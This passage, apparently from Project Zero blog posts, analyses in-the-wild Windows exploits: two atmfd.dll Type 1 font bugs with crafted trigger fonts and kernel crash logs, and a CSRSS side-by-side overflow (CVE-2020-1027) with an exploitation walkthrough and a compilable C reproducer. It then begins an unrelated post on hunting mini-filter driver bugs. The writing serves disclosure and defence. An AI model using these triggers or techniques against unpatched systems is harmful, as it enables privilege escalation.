In this layout, the ptrs and values rows are the user-controlled local arrays, while the saved registers and the return address are internal control flow data that could be corrupted. Interestingly, the two arrays were separated by the saved RDI register and the return address, which was likely caused by a compiler optimization and the short length of values. A direct overflow of the return address is not very useful here, as it is always overwritten with a non-executable address. However, if we ignore it for now and continue with the stack corruption, the next pointer at ptrs[4] overlaps with controlled data in values[0] and values[1], and the code uses it to write the values[4] integer there. This is a classic write-what-where condition in the kernel.

After the first controlled write of a 32-bit value, the next iteration of the loop tries to write values[5] to an address made of ((values[3]<<32)|values[2]). This second write-what-where is what gives the attacker a way to safely escape the function. At this point, the return address is inevitably corrupted, and the only way to exit without crashing the kernel is through an access to invalid ring-3 memory. Such an exception is intercepted by a generic catch-all handler active throughout the font parsing performed by atmfd, and it safely returns execution back to the user-mode caller. This makes the vulnerability very reliable in exploitation, as the write-what-where primitive is quickly followed by a clean exit, without any undesired side effects taking place in between.

A proof-of-concept test case is easily crafted by taking any existing Type 1 font, and recompiling it (e.g. with the detype1 + type1 utilities as part of AFDKO) to add two extra objects to the .PFB file. A minimal sample in textual form is shown below:

~%!PS-AdobeFont-1.0: Test 001.001
dict begin
/FontInfo begin
/FullName (Test) def
end
/FontType 1 def
/FontMatrix [0.001 0 0 0.001 0 0] def
/WeightVector [0 0 0 0 0] def
/Private begin
/Blend begin
/VToHOrigin[[16705.25490 -0.00001 0 0 16962.25882]]
/end
end
currentdict end
%currentfile eexec /Private begin
/CharStrings 1 begin
/.notdef ## -| { endchar } |-
end
end
mark %currentfile closefile
cleartomark

The /WeightVector line sets numMasters to 5, and the /VToHOrigin line triggers a write of 0x42424242 (represented as 16962.25882) to 0xffffffff41414141 (16705.25490 and -0.00001). A crash can be reproduced by making sure that the PFB and PFM files are in the same directory, and opening the PFM file in the default Windows Font Viewer program. You should then be able to observe the following bugcheck in the kernel debugger:

PAGE_FAULT_IN_NONPAGED_AREA (50)
Invalid system memory was referenced.  This cannot be protected by try-except.
Typically the address is just plain bad or it is pointing at freed memory.
Arguments:
Arg1: ffffffff41414141, memory referenced.
Arg2: 0000000000000001, value 0 = read operation, 1 = write operation.
Arg3: fffff96000a86144, If non-zero, the instruction address which referenced the bad memory
        address.
Arg4: 0000000000000002, (reserved)

[...]

TRAP_FRAME:  ffffd000415eefa0 -- (.trap 0xffffd000415eefa0)
NOTE: The trap frame does not contain all registers.
Some register values may be zeroed or incorrect.
rax=0000000042424242 rbx=0000000000000000 rcx=ffffffff41414141
rdx=0000000000000005 rsi=0000000000000000 rdi=0000000000000000
rip=fffff96000a86144 rsp=ffffd000415ef130 rbp=0000000000000000
 r8=0000000000000000  r9=000000000000000e r10=0000000000000000
r11=00000000fffffffb r12=0000000000000000 r13=0000000000000000
r14=0000000000000000 r15=0000000000000000
iopl=0         nv up ei pl nz na po cy
ATMFD+0x22144:
fffff96000a86144 890499          mov     dword ptr [rcx+rbx*4],eax ds:ffffffff41414141=????????
Resetting default scope

Font bug #2

The second issue was found in the processing of the /BlendDesignPositions object, which is defined in the Adobe Font Metrics File Format Specification document from 1998. Its handler is located at offset 0x21608 of atmfd.dll, and again using the fontdrvhost.exe symbols, we can learn that its internal name is SetBlendDesignPositions. Let's analyze the C-like pseudo code:

int SetBlendDesignPositions(void *arg) {
  int num_master;
  Fixed16_16 values[16][15];

  for (num_master = 0; ; num_master++) {
    if (GetToken() != TOKEN_OPEN) {
      break;
    }
    int values_read = GetOpenFixedArray(&values[num_master], 15);
    SetNumAxes(values_read);
  }

  SetNumMasters(num_master);

  for (int i = 0; i < num_master; i++) {
    procs->BlendDesignPositions(i, &values[i]);
  }

  return 0;
}

The bug was simple. In the first for() loop, there was no upper bound enforced on the number of iterations, so one could read data into the arrays at &values[0], &values[1], ..., and then out-of-bounds at &values[16], &values[17] and so on. Most importantly, the GetOpenFixedArray function may read between 0 and 15 fixed point 32-bit values depending on the input file, so one could choose to write little or no data at specific offsets. This created a powerful non-continuous stack corruption primitive, which made it possible to easily redirect execution to a specific address or build a ROP chain directly on the stack. For example, the SetBlendDesignPositions function itself was compiled with a /GS cookie, but it was possible to overwrite another return address higher up the call chain to hijack the control flow.

To trigger the bug, it is sufficient to load a Type 1 font that includes a specially crafted /BlendDesignPositions object:

~%!PS-AdobeFont-1.0: Test 001.001
dict begin
/FontInfo begin
/FullName (Test) def
end
/FontType 1 def
/FontMatrix [0.001 0 0 0.001 0 0] def
/BlendDesignPositions [[][][][][][][][][][][][][][][][][][][][][][][0 0 0 0 16705.25490 -0.00001]]
/Private begin
/Blend begin
/end
end
currentdict end
%currentfile eexec /Private begin
/CharStrings 1 begin
/.notdef ## -| { endchar } |-
end
end
mark %currentfile closefile
cleartomark

In the /BlendDesignPositions line, we first specify 22 empty arrays that don't corrupt any memory and only shift the index up to &values[22]. Then, we write the 32-bit values 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x41414141, 0xffffffff to values[22][0..5]. On a vulnerable Windows 8.1, this coincides with the position of an unprotected return address higher on the stack. When such a font is loaded through GDI, the following kernel bugcheck is generated:

PAGE_FAULT_IN_NONPAGED_AREA (50)
Invalid system memory was referenced.  This cannot be protected by try-except.
Typically the address is just plain bad or it is pointing at freed memory.
Arguments:
Arg1: ffffffff41414141, memory referenced.
Arg2: 0000000000000008, value 0 = read operation, 1 = write operation.
Arg3: ffffffff41414141, If non-zero, the instruction address which referenced the bad memory
        address.
Arg4: 0000000000000002, (reserved)

[...]

TRAP_FRAME:  ffffd0003e7ca140 -- (.trap 0xffffd0003e7ca140)
NOTE: The trap frame does not contain all registers.
Some register values may be zeroed or incorrect.
rax=0000000000000000 rbx=0000000000000000 rcx=aae4a99ec7250000
rdx=0000000000000027 rsi=0000000000000000 rdi=0000000000000000
rip=ffffffff41414141 rsp=ffffd0003e7ca2d0 rbp=0000000000000002
 r8=0000000000000618  r9=0000000000000024 r10=fffff90000002000
r11=ffffd0003e7ca270 r12=0000000000000000 r13=0000000000000000
r14=0000000000000000 r15=0000000000000000
iopl=0         nv up ei ng nz na po nc
ffffffff`41414141 ??              ???
Resetting default scope

Exploitation

According to our analysis, the font exploit supported the following Windows versions:

  • Windows 8.1 (NT 6.3)
  • Windows 8 (NT 6.2)
  • Windows 7 (NT 6.1)
  • Windows Vista (NT 6.0)

When run on systems up to and including Windows 8, the exploit started off by triggering the write-what-where condition (bug #1) twice, to set up a minimalistic 8-byte bootstrap code at a fixed address around 0xfffff90000000000. This location corresponds to the win32k.sys session space, and is mapped as RWX in these old versions of Windows, which means that KASLR didn't have to be bypassed as part of the attack. As the next step, the exploit used bug #2 to redirect execution to the first stage payload. Each of these actions was performed through a single NtGdiAddRemoteFontToDC system call, which can conveniently load Type 1 fonts from memory (as previously discussed here), and was enough to reach both vulnerabilities. In total, the privilege escalation process took only three syscalls.

Things get more complicated on Windows 8.1, where the session space is no longer executable:

0: kd> !pte fffff90000000000
PXE at FFFFF6FB7DBEDF90
contains 0000000115879863
pfn 115879    ---DA--KWEV
PPE at FFFFF6FB7DBF2000
contains 0000000115878863
pfn 115878    ---DA--KWEV
PDE at FFFFF6FB7E400000
contains 0000000115877863
pfn 115877    ---DA--KWEV
PTE at FFFFF6FC80000000
contains 8000000115976863
pfn 115976    ---DA--KW-V
As a result, the memory cannot be used so trivially as a staging area for the controlled kernel-mode code, but with a write-what-where primitive, there are many ways to work around it. In this specific exploit, the author switched from the session space to another page with a constant address – the shared user data region at 0xfffff78000000000. Notably, that page is not executable by default either, but thanks to the fixed location of page tables in Windows 8.1, it can be made executable with a single 32-bit write of value 0x0 to address 0xfffff6fbc0000004, which stores the relevant page table entry. This is what the exploit did – it disabled the NX bit in PTE, then wrote a 192-byte payload to the shared user page and executed it. This code path also performed some extra clean up, first by restoring the NX bit and then erasing traces of the attack from memory.

Once kernel execution reached the initial shellcode, a series of intermediary steps followed, each of them unpacking and jumping to a next, longer stage. Some code was encoded in the /FontMatrix PostScript object, some in the /FontBBox object, and even more directly in the font stream data. At this point, the exploit resolved the addresses of several exported symbols in ntoskrnl.exe, allocated RWX memory with a ExAllocatePoolWithTag(NonPagedPool) call, copied the final payload from the user-mode address space, and executed it. This is where we'll conclude our analysis, as the mechanics of the ring-0 shellcode are beyond the scope of this post.

The fixes

We reported the issues to Microsoft on March 17. Initially, they were subject to a 7-day deadline used by Project Zero for actively exploited vulnerabilities, but after receiving a request from the vendor, we agreed to provide an extension due to the global circumstances surrounding COVID-19. A security advisory was published by Microsoft on March 23, urging users to apply workarounds such as disabling the atmfd.dll font driver to mitigate the vulnerabilities. The fixes came out on April 14 as part of that month's Patch Tuesday, 28 days after our report.

Since both bugs were simple in nature, their fixes were equally simple too. In the ParseBlendVToHOrigin function, both ptrs and values arrays were extended to 16 entries, and an extra sanity check was added to ensure that numMasters wouldn't exceed 16:

int ParseBlendVToHOrigin(void *arg) {
  Fixed16_16 *ptrs[16];
  Fixed16_16 values[16];

  if (g_font->numMasters > 0x10) {
    return -4;
  }

  [...]
}

In the SetBlendDesignPositions function, an extra bounds check was introduced to limit the number of loop iterations to 16:

int SetBlendDesignPositions(void *arg) {
  int num_master;
  Fixed16_16 values[16][15];

  for (num_master = 0; ; num_master++) {
    if (GetToken() != TOKEN_OPEN) {
      break;
    }
    if (num_master >= 16) {
      return -4;
    }
    int values_read = GetOpenFixedArray(&values[num_master], 15);
    SetNumAxes(values_read);
  }

  [...]
}

2. CSRSS issue on Windows 10 (CVE-2020-1027)

Background

The Client/Server Runtime Subsystem, or csrss.exe, is the user-mode part of the Win32 subsystem. Before Windows NT 4.0, CSRSS was in charge of the entire graphical user interface; nowadays, it implements tasks related to, for example, process and thread management.

csrss.exe is a user-mode process that runs with SYSTEM privileges. By default, every Win32 application opens a connection to CSRSS at startup. A significant number of API functions in Windows rely on the existence of the connection, so even the most restrictive application sandboxes, including the Chromium sandbox, can’t lock it down without causing stability problems. This makes CSRSS an appealing vector for privilege escalation attacks.

The communication with the subsystem server is performed via the ALPC mechanism, and the OS provides the high-level CSR API on top of it. The primary API function is called ntdll!CsrClientCallServer. It invokes a selected CSRSS routine and (optionally) receives the result:

NTSTATUS CsrClientCallServer(
    PCSR_API_MSG ApiMessage,
    PVOID CaptureBuffer,
    ULONG ApiNumber,
    LONG DataLength);

The ApiNumber parameter determines which routine will be executed. ApiMessage is a pointer to a corresponding message object of size DataLength, and CaptureBuffer is a pointer to a buffer in a special shared memory region created during the connection initialization. CSRSS employs shared memory to transfer large and/or dynamically-sized structures, such as strings. ApiMessage can contain pointers to objects inside CaptureBuffer, and the API takes care of translating the pointers between the client and server virtual address spaces.

The reader can refer to this series of posts for a detailed description of the CSRSS internals.

One of the CSRSS modules, sxssrv.dll, implements the support for side-by-side assemblies. Side-by-side assembly (SxS) technology is a standard for executable files that is primarily aimed at alleviating problems, such as version conflicts, arising from the use of dynamic-link libraries. In SxS, Windows stores multiple versions of a DLL and loads them on demand. An application can include a side-by-side manifest, i.e. a special XML document, to specify its exact dependencies. An example of an application manifest is provided below:

<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
  <assemblyIdentity type="win32" name="Microsoft.Windows.MySampleApp"
      version="1.0.0.0" processorArchitecture="x86"/>
  <dependency>
    <dependentAssembly>
      <assemblyIdentity type="win32" name="Microsoft.Tools.MyPrivateDll"
          version="2.5.0.0" processorArchitecture="x86"/>
    </dependentAssembly>
  </dependency>
</assembly>

The bug

The vulnerability in question has been discovered in the routine sxssrv!BaseSrvSxsCreateActivationContext, which has the API number 0x10017. The function parses an application manifest and all its (potentially transitive) dependencies into a binary data structure called an activation context, and the current activation context determines the objects and libraries that need to be redirected to a specific implementation.

The relevant ApiMessage object contains several UNICODE_STRING parameters, such as the application name and assembly store path. UNICODE_STRING is a well-known mutable string structure with a separate field to keep the capacity (MaximumLength) of the backing store:

typedef struct _UNICODE_STRING {
  USHORT Length;
  USHORT MaximumLength;
  PWSTR  Buffer;
} UNICODE_STRING, *PUNICODE_STRING;

BaseSrvSxsCreateActivationContext starts with validating the string parameters:

for (i = 0; i < 6; ++i) {
  if (StringField = StringFields[i]) {
    Length = StringField->Length;
    if (Length && !StringField->Buffer ||
        Length > StringField->MaximumLength || Length & 1)
      return 0xC000000D;
    if (StringField->Buffer) {
      if (!CsrValidateMessageBuffer(ApiMessage, &StringField->Buffer,
                                    Length + 2, 1)) {
        DbgPrintEx(0x33, 0,
                   "SXS: Validation of message buffer 0x%lx failed.\n"
                   " Message:%p\n"
                   " String %p{Length:0x%x, MaximumLength:0x%x, Buffer:%p}\n",
                   i, ApiMessage, StringField, StringField->Length,
                   StringField->MaximumLength, StringField->Buffer);
        return 0xC000000D;
      }
      CharCount = StringField->Length >> 1;
      if (StringField->Buffer[CharCount] &&
          StringField->Buffer[CharCount - 1])
        return 0xC000000D;
    }
  }
}

CsrValidateMessageBuffer is declared as follows:

BOOLEAN CsrValidateMessageBuffer(
    PCSR_API_MSG ApiMessage,
    PVOID* Buffer,
    ULONG ElementCount,
    ULONG ElementSize);

This function verifies that 1) the *Buffer pointer references data inside the associated capture buffer, 2) the expression *Buffer + ElementCount * ElementSize doesn’t cause an integer overflow, and 3) it doesn’t go past the end of the capture buffer.
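A sketch of those three checks; the capture-buffer bounds parameters are hypothetical stand-ins for state the real function reads from the connection’s capture buffer:

#include <stdint.h>

static int validate_message_buffer(uintptr_t buffer, uint64_t element_count,
                                   uint64_t element_size,
                                   uintptr_t capture_start,
                                   uintptr_t capture_end) {
  /* 1) the pointer must reference data inside the capture buffer */
  if (buffer < capture_start || buffer > capture_end)
    return 0;
  /* 2) element_count * element_size must not overflow */
  uint64_t total = element_count * element_size;
  if (element_size && total / element_size != element_count)
    return 0;
  /* 3) buffer + total must not go past the end of the capture buffer */
  if (total > (uint64_t)(capture_end - buffer))
    return 0;
  return 1;
}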

As the reader can see, the buffer size for the validation is calculated based on the Length field rather than MaximumLength. This would be safe if the strings were only used as input parameters. Unfortunately, the string at offset 0x120 from the beginning of ApiMessage (we’ll be calling it ApplicationName) can also be re-used as an output parameter. The affected call stack looks as follows:

sxs!CNodeFactory::XMLParser_Element_doc_assembly_assemblyIdentity
sxs!CNodeFactory::CreateNode
sxs!XMLParser::Run
sxs!SxspIncorporateAssembly
sxs!SxspCloseManifestGraph
sxs!SxsGenerateActivationContext
sxssrv!BaseSrvSxsCreateActivationContextFromStructEx
sxssrv!BaseSrvSxsCreateActivationContext

When BaseSrvSxsCreateActivationContextFromStructEx is called, it initializes an instance of the SXS_GENERATE_ACTIVATION_CONTEXT_PARAMETERS structure with the pointer to ApplicationName’s buffer and the unaudited MaximumLength value as the buffer size:

BufferCapacity = CreateCtxParams->ApplicationName.MaximumLength;
if (BufferCapacity) {
  GenActCtxParams.ApplicationNameCapacity = BufferCapacity >> 1;
  GenActCtxParams.ApplicationNameBuffer =
      CreateCtxParams->ApplicationName.Buffer;
} else {
  GenActCtxParams.ApplicationNameCapacity = 60;
  StringBuffer = RtlAllocateHeap(NtCurrentPeb()->ProcessHeap, 0, 120);
  if (!StringBuffer) {
    Status = 0xC0000017;
    goto error;
  }
  GenActCtxParams.ApplicationNameBuffer = StringBuffer;
}

Then sxs!SxsGenerateActivationContext passes those values to ACTCTXGENCTX:

Context = (_ACTCTXGENCTX *)HeapAlloc(g_hHeap, 0, 0x10D8);
if (Context) {
  Context = _ACTCTXGENCTX::_ACTCTXGENCTX(Context);
} else {
  FusionpTraceAllocFailure(v14);
  SetLastError(0xE);
  goto error;
}
if (GenActCtxParams->ApplicationNameBuffer &&
    GenActCtxParams->ApplicationNameCapacity) {
  Context->ApplicationNameBuffer = GenActCtxParams->ApplicationNameBuffer;
  Context->ApplicationNameCapacity = GenActCtxParams->ApplicationNameCapacity;
}

Ultimately, sxs!CNodeFactory::XMLParser_Element_doc_assembly_assemblyIdentity calls memcpy that can go past the end of the capture buffer:

IdentityNameBuffer = 0;
IdentityNameLength = 0;
SetLastError(0);
if (!SxspGetAssemblyIdentityAttributeValue(0, v11, &s_IdentityAttribute_name,
                                           &IdentityNameBuffer,
                                           &IdentityNameLength)) {
  CallSiteInfo = off_16506FA20;
  goto error;
}
if (IdentityNameLength &&
    IdentityNameLength < Context->ApplicationNameCapacity) {
  memcpy(Context->ApplicationNameBuffer, IdentityNameBuffer,
         2 * IdentityNameLength + 2);
  Context->ApplicationNameLength = IdentityNameLength;
} else {
  *Context->ApplicationNameBuffer = 0;
  Context->ApplicationNameLength = 0;
}

The source data for the memcpy call comes from the name parameter of the main assemblyIdentity node in the manifest.

Exploitation

Even though the vulnerability was present in older versions of Windows, the exploit only targets Windows 10. All major builds up to 18363 are supported.

As a result of the vulnerability, the attacker can call memcpy with fully controlled contents and size. This is one of the best initial primitives a memory corruption bug can provide, but there’s one potential issue. So far it seems like the bug allows the attacker to write data either past the end of the capture buffer in a shared memory region, which they can already write to from the sandboxed process, or past the end of the shared region, in which case it’s quite difficult to reliably make a “useful” allocation right next to the region. Luckily for the attacker, the vulnerable code actually operates on a copy of the original capture buffer, which is made by csrsrv!CsrCaptureArguments to avoid potential issues caused by concurrent modification of the buffer contents, and the copy is allocated in the regular heap.

The logical first step of the exploit would be to leak some data needed for an ASLR bypass. However, the following design quirks in Windows and CSRSS make it unnecessary:

  • Windows randomizes module addresses once per boot, and csrss.exe is a regular user-mode process. This means that the attacker can use modules loaded in both csrss.exe and the compromised sandboxed process, for example, ntdll.dll, for code-reuse attacks.

  • csrss.exe provides client processes with its virtual address of the shared region during initialization so they can adjust pointers for API calls. The offset between the “local” and “remote” addresses is stored in ntdll!CsrPortMemoryRemoteDelta. Thus, the attacker can store, e.g., fake structures needed for the attack in the shared mapping at a predictable address.

The exploit also has to bypass another security feature, Microsoft’s Control Flow Guard, which makes it significantly more difficult to jump into a code reuse gadget chain via an indirect function call. The attacker has decided to exploit the CFG’s inability to protect return addresses on the stack to gain control of the instruction pointer. The complete algorithm looks as follows:

1. Groom the heap. The exploit makes a preliminary CreateActivationContext call with a specially crafted manifest needed to massage the heap into a predictable state. It contains an XML node with numerous attributes in the form aa:aabN="BB...BB". The manifest for the second call, which actually triggers the vulnerability, contains similar but different-sized attributes.

2. Implement write-what-where. The buffer overflow is used to overwrite the contents of XMLParser::_MY_XML_NODE_INFO nodes. _MY_XML_NODE_INFO may optionally contain a pointer to an internal character buffer. During subsequent parsing, if the current element is a numeric character entity (i.e. a string in the form &#x01234;), the parser calls XMLParser::CopyText to store the decoded character in the internal buffer of the currently active _MY_XML_NODE_INFO node. Therefore, by overwriting multiple nodes, the exploit can write data of any size to a controlled address.

3. Overwrite the loaded module list. The primitive gained in the previous step is used to modify the pointer to the loaded module list located in the PEB_LDR_DATA structure inside ntdll.dll, which is possible because the attacker has already obtained the base address of the library from the sandboxed process. The fake module list consists of numerous LDR_MODULE entries and is stored in the shared memory region. The unofficial definition of the structure is shown below:

typedef struct _LDR_MODULE {
  LIST_ENTRY InLoadOrderModuleList;
  LIST_ENTRY InMemoryOrderModuleList;
  LIST_ENTRY InInitializationOrderModuleList;
  PVOID BaseAddress;
  PVOID EntryPoint;
  ULONG SizeOfImage;
  UNICODE_STRING FullDllName;
  UNICODE_STRING BaseDllName;
  ULONG Flags;
  SHORT LoadCount;
  SHORT TlsIndex;
  LIST_ENTRY HashTableEntry;
  ULONG TimeDateStamp;
} LDR_MODULE, *PLDR_MODULE;

When a new thread is created, the ntdll!LdrpInitializeThread function will follow the module list and, provided that the necessary flags are set, run the function referenced by the EntryPoint member with BaseAddress as the first argument. The EntryPoint call is still protected by the CFG, so the exploit can’t jump to a ROP chain yet. However, this gives the attacker the ability to execute an arbitrary sequence of one-argument function calls.

4. Launch a new thread. The exploit deliberately causes a null pointer dereference. The exception handler in csrss.exe catches it and creates an error-reporting task in a new thread via csrsrv!CsrReportToWerSvc.

5. Restore the module list. Once the execution reaches the fake module list processing, it’s important to restore PEB_LDR_DATA’s original state to avoid crashes in other threads. The attacker has discovered that a pair of ntdll!RtlPopFrame and ntdll!RtlPushFrame calls can be used to copy an 8-byte value from one given address to another. The fake module list starts with such a pair to fix the loader data structure.

6. Leak the stack register. In this step the exploit takes full advantage of the shared memory region. First, it calls setjmp to leak the register state into the shared region. The next module entry points to itself, so the execution enters an infinite loop of NtYieldExecution calls. In the meantime, the sandboxed process detects that the data in the setjmp buffer has been modified. It calculates the return address location for the LdrpInitializeThread stack frame, sets it as the destination address for a subsequent copy operation, and modifies the InLoadOrderModuleList pointer of the current module entry, thus breaking the loop.

7. Overwrite the return address. After the exploit exits the loop in csrss.exe, it performs two more copy operations: overwrites the return address with a stack pivot pointer, and puts the fake stack address next to it. Then, when LdrpInitializeThread returns, the execution continues in the ROP chain.

8. Transition to winlogon.exe. The ROP payload creates a new memory section and shares it with both winlogon.exe, which is another highly-privileged Windows process, and the sandboxed process. Then it creates a new thread in winlogon.exe using an address inside the section as the entry point. The sandboxed process writes the final stage of the exploit to the section, which downloads and executes an implant. The rest of the ROP payload is needed to restore the normal state of csrss.exe and terminate the error reporting thread.

The fix

We reported the issue to Microsoft on March 23. Similarly to the font bugs, it was subject to a 7-day deadline used by Project Zero for actively exploited vulnerabilities, but after receiving a request from the vendor, we agreed to provide an extension due to the global circumstances surrounding COVID-19. The fix came out 22 days after our report.

The patch renamed BaseSrvSxsCreateActivationContext to BaseSrvSxsCreateActivationContextFromMessage and added an extra CsrValidateMessageBuffer call for the ApplicationName field, this time with MaximumLength as the size argument:

ApplicationName = ApiMessage->CreateActivationContext.ApplicationName;
if (ApplicationName.MaximumLength &&
    !CsrValidateMessageBuffer(ApiMessage, &ApplicationName.Buffer,
                              ApplicationName.MaximumLength, 1)) {
  SavedMaximumLength = ApplicationName.MaximumLength;
  ApplicationName.MaximumLength = ApplicationName.Length + 2;
}

[...]

if (SavedMaximumLength)
  ApiMessage->CreateActivationContext.ApplicationName.MaximumLength =
      SavedMaximumLength;

return result;

Appendix A

The following reproducer has been tested on Windows 10.0.18363.959.

#include <stdint.h>
#include <stdio.h>
#include <windows.h>
#include <string>

const char* MANIFEST_CONTENTS =
    "<?xml version='1.0' encoding='UTF-8' standalone='yes'?>"
    "<assembly xmlns='urn:schemas-microsoft-com:asm.v1' manifestVersion='1.0'>"
    "<assemblyIdentity name='@' version='1.0.0.0' type='win32' "
    "processorArchitecture='amd64'/>"
    "</assembly>";

const WCHAR* NULL_BYTE_STR = L"\x00\x00";
const WCHAR* MANIFEST_NAME =
  L"msil_system.data.sqlxml.resources_b77a5c561934e061_3.0.4100.17061_en-us_"
  L"d761caeca23d64a2.manifest";
const WCHAR* PATH = L"\\\\.\\c:Windows\\";
const WCHAR* MODULE = L"System.Data.SqlXml.Resources";

typedef PVOID(__stdcall* f_CsrAllocateCaptureBuffer)(ULONG ArgumentCount,
                                                     ULONG BufferSize);
f_CsrAllocateCaptureBuffer CsrAllocateCaptureBuffer;

typedef NTSTATUS(__stdcall* f_CsrClientCallServer)(PVOID ApiMessage,
                                                   PVOID CaptureBuffer,
                                                   ULONG ApiNumber,
                                                   ULONG DataLength);
f_CsrClientCallServer CsrClientCallServer;

typedef NTSTATUS(__stdcall* f_CsrCaptureMessageString)(LPVOID CaptureBuffer,
                                                       PCSTR String,
                                                       ULONG Length,
                                                       ULONG MaximumLength,
                                                       PSTR OutputString);
f_CsrCaptureMessageString CsrCaptureMessageString;

NTSTATUS CaptureUnicodeString(LPVOID CaptureBuffer, PSTR OutputString,
                              PCWSTR String, ULONG Length = 0) {
  if (Length == 0) {
    Length = lstrlenW(String);
  }
  return CsrCaptureMessageString(CaptureBuffer, (PCSTR)String, Length * 2,
                                 Length * 2 + 2, OutputString);
}

int main() {
  HMODULE Ntdll = LoadLibrary(L"Ntdll.dll");
  CsrAllocateCaptureBuffer = (f_CsrAllocateCaptureBuffer)GetProcAddress(
      Ntdll, "CsrAllocateCaptureBuffer");
  CsrClientCallServer =
      (f_CsrClientCallServer)GetProcAddress(Ntdll, "CsrClientCallServer");
  CsrCaptureMessageString = (f_CsrCaptureMessageString)GetProcAddress(
      Ntdll, "CsrCaptureMessageString");

  char Message[0x220];
  memset(Message, 0, 0x220);
  PVOID CaptureBuffer = CsrAllocateCaptureBuffer(4, 0x300);
  std::string Manifest = MANIFEST_CONTENTS;
  Manifest.replace(Manifest.find('@'), 1, 0x2000, 'A');

  // There's no public definition of the relevant CSR_API_MSG structure.
  // The offsets and values are taken directly from the exploit.
  *(uint32_t*)(Message + 0x40) = 0xc1;
  *(uint16_t*)(Message + 0x44) = 9;
  *(uint16_t*)(Message + 0x59) = 0x201;

  // CSRSS loads the manifest contents from the client process memory;
  // therefore, it doesn't have to be stored in the capture buffer.
  *(const char**)(Message + 0x80) = Manifest.c_str();
  *(uint64_t*)(Message + 0x88) = Manifest.size();
  *(uint64_t*)(Message + 0xf0) = 1;

  CaptureUnicodeString(CaptureBuffer, Message + 0x48, NULL_BYTE_STR, 2);
  CaptureUnicodeString(CaptureBuffer, Message + 0x60, MANIFEST_NAME);
  CaptureUnicodeString(CaptureBuffer, Message + 0xc8, PATH);
  CaptureUnicodeString(CaptureBuffer, Message + 0x120, MODULE);

  // Triggers the issue by setting ApplicationName.MaxLength to a large value.
  *(uint16_t*)(Message + 0x122) = 0x8000;

  CsrClientCallServer(Message, CaptureBuffer, 0x10017, 0xf0);
}

This is part 6 of a 6-part series detailing a set of vulnerabilities found by Project Zero being exploited in the wild. To read the other parts of the series, see the introduction post.

Hunting for Bugs in Windows Mini-Filter Drivers

Posted by James Forshaw, Project Zero

In December Microsoft fixed 4 issues in Windows in the Cloud Filter and Windows Overlay Filter (WOF) drivers (CVE-2020-17103, CVE-2020-17134, CVE-2020-17136, CVE-2020-17139). These 4 issues were 3 local privilege escalations and a security feature bypass, and they were all present in Windows file system filter drivers. I’ve found a number of issues in filter drivers previously, including 6 in the LUAFV driver which implements UAC file virtualization.

The purpose of a file system filter driver according to Microsoft is:

“A file system filter driver can filter I/O operations for one or more file systems or file system volumes. Depending on the nature of the driver, filter can mean log, observe, modify, or even prevent. Typical applications for file system filter drivers include antivirus utilities, encryption programs, and hierarchical storage management systems.”

What this boils down to is the filter driver can inspect and modify almost any IO request sent to a file system. This power comes with many responsibilities, and considering the complexity of the IO model on Windows it can be hard to avoid introducing subtle bugs.

With the issues now fixed, I thought it would be a good opportunity to go into a bit more detail on how you can research file system filter drivers, specifically the kinds of things I looked at to find my security vulnerabilities. I’m going to give an overview of how filter drivers work, how you communicate with them, some hints on reverse engineering, and some of the common security issues you might discover. I’ll also provide some example code to illustrate common coding patterns. The goal is to enable you to do your own research in this area.

I’m assuming you have some prior knowledge of how the IO Manager works and have experience in finding security issues in non-filter drivers. Also, I’m not claiming this to be an exhaustive description of bug hunting in filter drivers, as the topic is very deep and complex. With that in mind, let’s start with an overview of how a filter driver works.

Filter Driver Implementation

A filter driver exploits the way the Windows IO Manager implements file system drivers. When you make a request to access a file, such as calling the NtCreateFile system call, the IO Manager allocates an IO Request Packet (IRP) structure which contains the operation type and all the parameters for the operation. The IRP is then dispatched to the top of the device stack associated with the request.

A filter driver registers for the IO requests it supports with a callback function which is invoked when a specific IO request type IRP is queued in the device stack. The driver callback can then do a number of different things to the IRP.

  • Pass the IRP unmodified directly to the next driver in the stack.
  • Modify the IRP then pass to the next driver.
  • Modify the IRP response.
  • Complete the IRP operation with a success result.
  • Complete the IRP operation with an error result.
  • Pass the IRP to a different device stack.

These are the basics of how a filter driver works: the driver is attached at a suitable point in a device stack and handles IO requests. When an IRP of interest is received, it can perform one of the operations above to filter the request. If it wants to inspect or modify the response, it can register a completion routine and handle the operation in that callback.

It’s important to note that the IRP doesn’t automatically propagate down the stack. A driver can choose to complete the IRP, which means it’ll not be processed by any other driver further down the stack. If the driver passes on the IRP, it must register a completion routine; otherwise it’ll not be notified when the IRP has been processed by the lower drivers in the stack. A minimal sketch of this pass-down pattern is shown below.
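The pass-down pattern a legacy filter uses looks roughly like the following sketch; FILTER_EXTENSION and the routine names are placeholders, not from any particular driver:

NTSTATUS FilterCompletion(PDEVICE_OBJECT DeviceObject, PIRP Irp, PVOID Context) {
    // Inspect or modify Irp->IoStatus here before the IRP continues
    // back up the stack.
    if (Irp->PendingReturned)
        IoMarkIrpPending(Irp);
    return STATUS_SUCCESS;
}

NTSTATUS FilterDispatch(PDEVICE_OBJECT DeviceObject, PIRP Irp) {
    PFILTER_EXTENSION ext = DeviceObject->DeviceExtension; // driver-defined
    // Give the lower driver the same parameters and ask for a
    // completion callback.
    IoCopyCurrentIrpStackLocationToNext(Irp);
    IoSetCompletionRoutine(Irp, FilterCompletion, NULL, TRUE, TRUE, TRUE);
    return IoCallDriver(ext->LowerDevice, Irp);
}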

For a file system filter the insertion point would typically be on top of the file system device object which is exposed by a file system driver such as NTFS. However, the driver can insert itself almost anywhere, allowing it to filter not just file system requests but also change data such as disk sectors. For example the Bitlocker Full Disk Encryption driver is a filter which is attached to the top of a volume block device. Any sectors passed in a write IRP are encrypted before passing to the lower driver. Read IRPs are handled in a completion routine and the sectors are decrypted before returning to the caller.

The Filter Manager and Mini-Filters

Implementing a filter driver from scratch is quite complicated. You have to handle every single IO request type, even if you don’t care about it, so that it can be forwarded to the next driver in the stack. You also have to find the correct point to insert your filter driver into the device stack. It’s easy to attach a driver to the top of the stack but trying to insert in the middle of an existing stack can be a recipe for disaster, for example the ordering of the filter drivers in the stack might differ depending on load order.

To make it easier to write a filter driver Windows comes with the Filter Manager Driver which takes care of handling IO requests and device stacks. This allows a developer to write what’s called a mini-filter driver instead of a, now named, legacy filter driver. The following diagram shows how the architecture changes when you introduce the filter manager.

